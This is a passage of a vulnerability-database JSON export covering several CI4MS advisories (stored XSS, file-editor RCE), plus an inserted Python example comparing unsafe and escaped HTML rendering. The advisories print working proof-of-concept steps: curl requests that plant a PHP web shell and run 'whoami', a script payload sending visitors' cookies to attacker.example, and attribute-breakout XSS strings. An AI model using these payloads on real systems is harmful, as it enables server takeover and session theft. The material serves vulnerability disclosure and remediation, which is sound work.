user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/SAdVxK7b#kFW_sFOim_d_1AnVcpwvzOEV4MHv33LLooL4Xa_Ymgg",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34567",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15923",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15872",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15912",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18292",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34567"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r33w-c82v-x5v7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r33w-c82v-x5v7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34567",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34567"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r33w-c82v-x5v7",
                    "reference_id": "GHSA-r33w-c82v-x5v7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r33w-c82v-x5v7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34567",
                "GHSA-r33w-c82v-x5v7"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8hmq-7f3h-fyfw"
        },
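The two stored-XSS entries above (VCID-7eme-yx6r-63ad, Mail Settings, and VCID-8hmq-7f3h-fyfw, blog Categories) are the same bug in two output contexts: the Mail Settings payload starts with `test">`, which closes a quoted `value="..."` attribute and the tag it sits in and then opens an `<img>` with an `onerror` handler; the Categories payload is a bare tag dropped into element content. The Python below is an added example, not ci4ms or VulnerableCode code, written in Python rather than the project's PHP so the parse step is reproducible. The `mail_server` input and the category `<li>` markup are assumed shapes, not the project's templates. It renders both payloads, quoted verbatim from the advisories, the unsafe way and the encoded way, then tokenizes the result the way a browser would to count which tags and `on*` handlers actually survive.

```python
"""Attribute-context vs. element-content encoding for the two stored-XSS
advisories above.  Added example; the templates are assumed, not ci4ms views."""
from __future__ import annotations

import html
from html.parser import HTMLParser

# Payloads quoted in the two advisories.
ATTR_PAYLOAD = 'test"><img src=1 onerror=alert()>" class="form-control" placeholder="Name" required>'
BODY_PAYLOAD = '<img src=x onerror=alert(document.domain)>'


def render_mail_server_unsafe(value: str) -> str:
    # Raw interpolation into a quoted attribute: a '"' in the value ends it.
    return f'<input name="mail_server" value="{value}" class="form-control">'


def render_mail_server_safe(value: str) -> str:
    # quote=True also encodes '"' and "'", so the value cannot close the attribute.
    return f'<input name="mail_server" value="{html.escape(value, quote=True)}" class="form-control">'


def render_category_unsafe(name: str) -> str:
    # Element content: any '<' starts a tag.
    return f'<li class="category">{name}</li>'


def render_category_safe(name: str) -> str:
    return f'<li class="category">{html.escape(name)}</li>'


class _Audit(HTMLParser):
    """Collects what the tokenizer sees: tags, on* handlers, input attrs, text."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.event_handlers: list[tuple[str, str]] = []
        self.inputs: list[dict[str, str | None]] = []
        self.text: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.event_handlers.append((tag, name))
        if tag == "input":
            # HTMLParser hands attribute values back already entity-decoded.
            self.inputs.append(dict(attrs))

    def handle_data(self, data):
        self.text.append(data)


def audit(markup: str) -> dict:
    """Summarize the tag soup a browser would build from `markup`."""
    p = _Audit()
    p.feed(markup)
    p.close()
    return {"tags": p.tags, "event_handlers": p.event_handlers,
            "inputs": p.inputs, "text": "".join(p.text)}


if __name__ == "__main__":
    for label, markup in [("mail/unsafe", render_mail_server_unsafe(ATTR_PAYLOAD)),
                          ("mail/safe", render_mail_server_safe(ATTR_PAYLOAD)),
                          ("category/unsafe", render_category_unsafe(BODY_PAYLOAD)),
                          ("category/safe", render_category_safe(BODY_PAYLOAD))]:
        print(label, audit(markup))
```

In the encoded renders the parser sees exactly one tag, no handler, and the original payload string intact as an attribute value or as text, which is the property to test for in a regression suite. The same context split applies to the client-side sinks both advisories name: `element.textContent = value` is the element-content equivalent of `html.escape`, `element.innerHTML = value` is the unsafe render, and in CodeIgniter 4 views `esc($value, 'attr')` is the attribute-context escaper to use inside `value="..."`.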
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49915?format=api",
            "vulnerability_id": "VCID-8j49-k5yj-3kes",
            "summary": "CI4MS Vulnerable to Remote Code Execution (RCE) via Arbitrary File Creation and Save in File Editor\n**Summary**\n\nA critical vulnerability has been identified in CI4MS that allows an authenticated user with file editor permissions to achieve Remote Code Execution (RCE). By leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server.\n\n**Vulnerability Details**\n\nThe vulnerability exists in the /backend/fileeditor/createFile and /backend/fileeditor/save API endpoints.\n\nUnrestricted File Creation: The createFile endpoint allows users to create files with any extension (including .php) in web-accessible directories such as /public.\n\nArbitrary Content Injection: The save endpoint allows users to write arbitrary content into the created files without sufficient server-side validation or sanitization.\n\nAn attacker can combine these two flaws to create a PHP webshell and execute system-level commands, leading to a complete compromise of the web server.\n\n**Impact**\n\nSuccessful exploitation allows:\n\nFull access to the server's file system and databases.\n\nExecution of arbitrary OS commands.\n\nPermanent modification or deletion of application data.\n\nSteps to Reproduce\n\nLog in to an account with permissions to use the file editor.\n\nCreate a new PHP file in a public directory using the following request:\n\n```\ncurl -X POST '[SERVER_URL]/backend/fileeditor/createFile' -d 'path=/public' -d 'name=exploit.php'\n```\n\nInject a PHP payload into the file using the save endpoint:\n\n```\ncurl -X POST '[SERVER_URL]/backend/fileeditor/save' -H 'Content-Type: application/json' -d '{\"path\":\"/public/exploit.php\",\"content\":\"<?php echo shell_exec($_GET[\\\"cmd\\\"]); ?>\"}'\n```\n\nAccess the file via the browser to execute commands: https://[SERVER_URL]/exploit.php?cmd=whoami\n\nSuggested Mitigation\n\nPath Validation: Restrict file operations to non-executable directories.\n\nExtension Whitelisting: Strictly allow only safe file extensions (e.g., .css, .js, .txt) and block executable extensions like .php, .phtml, etc.\n\nContent Sanitization: Implement server-side checks to prevent the injection of malicious code patterns.\n\nExecution Prevention: Disable PHP execution in public/upload directories via server configuration (e.g., .htaccess or Nginx config).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25510",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00183",
                            "scoring_system": "epss",
                            "scoring_elements": "0.39785",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00183",
                            "scoring_system": "epss",
                            "scoring_elements": "0.39812",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00183",
                            "scoring_system": "epss",
                            "scoring_elements": "0.39838",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00183",
                            "scoring_system": "epss",
                            "scoring_elements": "0.39835",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25510"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-04T16:28:51Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25510",
                    "reference_id": "CVE-2026-25510",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25510"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gp56-f67f-m4px",
                    "reference_id": "GHSA-gp56-f67f-m4px",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gp56-f67f-m4px"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px",
                    "reference_id": "GHSA-gp56-f67f-m4px",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-04T16:28:51Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73772?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.28.5%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.28.5%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-25510",
                "GHSA-gp56-f67f-m4px"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8j49-k5yj-3kes"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89751?format=api",
            "vulnerability_id": "VCID-8x3z-1p5j-6qfa",
            "summary": "CI4MS has stored XSS in Pages Content Due to Missing html_purify Sanitization\n## Summary\n\nThe Pages module does not apply the `html_purify` validation rule to content fields during create and update operations, while the Blog module does. Page content is stored unsanitized in the database and rendered as raw HTML on the public frontend via `echo $pageInfo->content`. An authenticated admin with page-editing privileges can inject arbitrary JavaScript that executes in the browser of every public visitor viewing the page.\n\n## Details\n\nThe Blog module correctly applies HTMLPurifier sanitization to content fields:\n\n**`modules/Blog/Controllers/Blog.php:82`**\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required|html_purify'],\n```\n\nThe Pages module omits this rule in both create and update methods:\n\n**`modules/Pages/Controllers/Pages.php:82`** (create)\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required'],\n```\n\n**`modules/Pages/Controllers/Pages.php:130`** (update)\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required'],\n```\n\nContent is stored directly without sanitization:\n\n**`modules/Pages/Controllers/Pages.php:111`** (create path)\n```php\n'content' => $lData['content'],\n```\n\n**`modules/Pages/Controllers/Pages.php:157`** (update path)\n```php\n'content' => $lData['content'],\n```\n\nOn the public frontend, the content is rendered as raw HTML without escaping:\n\n**`app/Views/templates/default/pages.php:32`**\n```php\n<?php echo $pageInfo->content ?>\n```\n\nNote that the same template correctly escapes the title field on line 9 using `esc($pageInfo->title)`, further confirming the content output is an oversight.\n\nThe `html_purify` custom validation rule is defined in `modules/Backend/Validation/CustomRules.php:54-73` and uses the HTMLPurifier library to strip dangerous HTML (script tags, event handlers) while preserving safe rich content. Its absence from the Pages validation is the root cause.\n\n## PoC\n\n**Step 1: Create a page with XSS payload (requires admin session)**\n```bash\ncurl -X POST https://target/backend/pages/create \\\n  -b 'ci_session=ADMIN_SESSION_COOKIE' \\\n  -H 'Content-Type: application/x-www-form-urlencoded' \\\n  -d 'lang[tr][title]=Test+Page&lang[tr][seflink]=test-xss-page&lang[tr][content]=<p>Normal+content</p><script>document.location=\"https://attacker.example/?c=\"%2Bdocument.cookie</script>&isActive=1'\n```\n\n**Step 2: Visit the page as any unauthenticated user**\n```\nhttps://target/tr/test-xss-page\n```\n\n**Expected result:** The `<script>` tag executes in the visitor's browser, sending their cookies to the attacker-controlled server.\n\n## Impact\n\n- **Session hijacking:** Attacker steals session cookies of any visitor, including other administrators\n- **Credential theft:** Injected JavaScript can render fake login forms or keylog credentials\n- **Site defacement:** Arbitrary HTML/JS can modify the public-facing page for all visitors\n- **Malware distribution:** Injected scripts can redirect visitors or load external payloads\n\nThe attack requires admin-level authentication (PR:H), but the impact crosses the security boundary to affect all unauthenticated public visitors (S:C). In a multi-admin CMS environment, a lower-privileged admin with only page-editing permissions could compromise higher-privileged admin sessions.\n\n## Recommended Fix\n\nAdd the `html_purify` validation rule to both the create and update methods in the Pages controller, consistent with the Blog module:\n\n**`modules/Pages/Controllers/Pages.php:82`** — change:\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required'],\n```\nto:\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required|html_purify'],\n```\n\n**`modules/Pages/Controllers/Pages.php:130`** — apply the same change:\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required|html_purify'],\n```\n\nAdditionally, as defense-in-depth, escape content output in the view template or use the existing `esc()` helper with the `'raw'` context for trusted HTML, ensuring HTMLPurifier has already processed it before storage.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39392",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02483",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02498",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02555",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02552",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39392"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fjpj-6qcq-6pw2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:19Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fjpj-6qcq-6pw2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39392",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39392"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fjpj-6qcq-6pw2",
                    "reference_id": "GHSA-fjpj-6qcq-6pw2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fjpj-6qcq-6pw2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-39392",
                "GHSA-fjpj-6qcq-6pw2"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8x3z-1p5j-6qfa"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89495?format=api",
            "vulnerability_id": "VCID-9ja8-6jec-nqg3",
            "summary": "CI4MS: System Settings (Social Media Management) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via System Settings – Social Media Management (Same-Page Attribute Breakout & Persistent Payload Injection)**\n- Stored Cross-site Scripting via Unsanitized Social Media Configuration Fields with Immediate Same-Page Execution\n\n### Description\nThe application fails to properly sanitize user-controlled input within **System Settings – Social Media Management**. Multiple configuration fields, including **Social Media** and **Social Media Link**, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding.\n\nUnlike typical stored XSS that executes on other pages (such as public-facing landing pages), this vulnerability executes directly on the same settings page. The injected payload breaks out of the input attribute context and is immediately interpreted by the browser, resulting in same-page DOM-based XSS.\n\nThis represents a different functionality and a separate vulnerability class from public-facing landing page injection.\n\n### Affected Functionality\n- System Settings – Social Media Management configuration\n- Same-page rendering of user-controlled input fields\n- DOM attribute injection within form inputs\n- Storage and retrieval of social media configuration values\n\n### Attack Scenario\n- An attacker injects a malicious JavaScript payload into one or more Social Media Management fields.\n- The payload breaks out of the HTML attribute context.\n- The application stores and re-renders the payload without sanitization or encoding.\n- The payload executes immediately on the same settings page when rendered.\n- The script executes in the browser context of the authenticated user managing settings.\n\n### Impact\n- Persistent Stored XSS\n- Immediate Same-Page DOM XSS execution\n- Execution of arbitrary JavaScript in victims’ browsers\n- Administrative privilege escalation\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire platform\n\nEndpoints:\n- `/backend/settings/` (Social Media Management)\n\n## Steps To Reproduce (POC)\n1. Navigate to System Settings -> Social Media Management\n2. Insert the following XSS payload into any Social Media or Social Media Link field:\n`test\"><img src=1 onerror=alert()>\" class=\"form-control\" placeholder=\"Name\" required>`\n3. Save the settings\n4. Observe that the payload breaks out of the input attribute context\n5. The XSS executes immediately on the same page\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/PBEFBCpJ#rGGxjnPN38qDtmJssAgIoLuStBcQaZFpR0J1bKAXApc",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34561",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21471",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21518",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21531",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0008",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23672",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34561"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
